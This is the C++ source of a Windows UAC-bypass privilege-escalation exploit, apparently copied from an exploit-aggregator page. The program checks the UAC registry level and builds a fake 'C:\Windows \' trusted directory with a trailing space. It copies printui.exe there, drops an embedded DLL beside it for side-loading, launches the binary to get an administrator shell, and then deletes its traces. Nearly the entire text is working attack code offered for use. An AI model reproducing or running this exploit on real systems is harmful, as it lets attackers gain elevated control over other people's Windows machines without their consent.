Share
## https://sploitus.com/exploit?id=1337DAY-ID-33357
#include <windows.h>
#include <stdio.h>
#include <string.h>
#include "resource.h"
#include <winres.h>
#include <string>
#include <tchar.h>
#define err -1
#define dis 0
#define def 1
#define max 2
#define BUFFER 8192
int CheckUac() {
int ConsentAdmin;
int EnableLua;
DWORD BufferSize = BUFFER;
RegGetValue(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", L"ConsentPromptBehaviorAdmin", RRF_RT_REG_DWORD, NULL, (PVOID)& ConsentAdmin, &BufferSize);
RegGetValue(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", L"EnableLUA", RRF_RT_REG_DWORD, NULL, (PVOID)& EnableLua, &BufferSize);
if (ConsentAdmin == 5 && EnableLua == 1) { return def; }
else if (ConsentAdmin == 2 && EnableLua == 1) { return max; }
else if (ConsentAdmin == 0 || EnableLua == 0) { return dis; }
else { return err; }
}
INT wmain() {
// Author : Abdelhamid Naceri
printf("[!] Author : Abdelhamid Naceri \n");
printf("[!] Checking UAC Level ...\n");
//Perform A Check Before begining because the uac would be triggered if it on the highest level
if (CheckUac() == def) {
printf("[+] UAC Is On Default Level ...\n");
}
else if (CheckUac() == max) {
printf("[-] UAC Is On Always Notify Level Cant Continue ...\n");
printf("[-] Exiting ...");
return 0;
}
else if (CheckUac() == dis) {
printf("[+] UAC Is Disabled This Exploit Is Not Required , Elevate Yourself ...\n");
printf("[+] Exiting ...");
//exit if the uac in the highest level
return 0;
}
else{
printf("[+] Something Went Wrong :(\n");
printf("[+] Exiting ...");
//unknown value retrieved from the registry
return 0;
}
printf("[+] Creating Fake Trusted Directory If Do No Exist ...\n");
CreateDirectoryW(L"\\\\?\\C:\\Windows \\", 0);
CreateDirectoryW(L"\\\\?\\C:\\Windows \\SysWOW64", 0);
//this "Windows " bypass the uac ANSI character set check
printf("[+] Copying Executable To Fake Trusted Directory ...\n");
CopyFileW(L"C:\\Windows\\SysWOW64\\printui.exe", L"\\\\?\\C:\\Windows \\SysWOW64\\printui.exe", false);
printf("[+] Extracting Resources To Fake Trusted Directory ...\n");
HMODULE hm = GetModuleHandle(NULL);
HRSRC res = FindResource(hm, MAKEINTRESOURCE(IDR_DLL1), L"dll");
DWORD DllSize = SizeofResource(hm, res);
void* dllBuff = LoadResource(hm, res);
HANDLE hDll = CreateFile(L"\\\\?\\C:\\Windows \\SysWOW64\\printui.dll", GENERIC_WRITE, 0, 0, CREATE_ALWAYS, 0, NULL);
//You Can Find The Full Project https://github.com/klinix5/UAC_Bypass
DWORD sizeout;
WriteFile(hDll, dllBuff, DllSize, &sizeout, NULL);
CloseHandle(hDll);
printf("[+] Spawning Administrator Shell ...\n");
ShellExecute(NULL, _T("open"), _T("C:\\Windows \\SysWOW64\\printui.exe"), NULL, NULL, SW_RESTORE);
printf("[+] PwNeD :) \n");
printf("[+] Cleaning Up Resources ...\n");
Sleep(3000);
DeleteFile(L"C:\\Windows \\SysWOW64\\printui.dll");
DeleteFile(L"C:\\Windows \\SysWOW64\\printui.exe");
_wrmdir(L"\\\\?\\C:\\Windows \\SysWOW64");
_wrmdir(L"\\\\?\\C:\\Windows ");
printf("[-_-] Exiting ...");
return 0;
}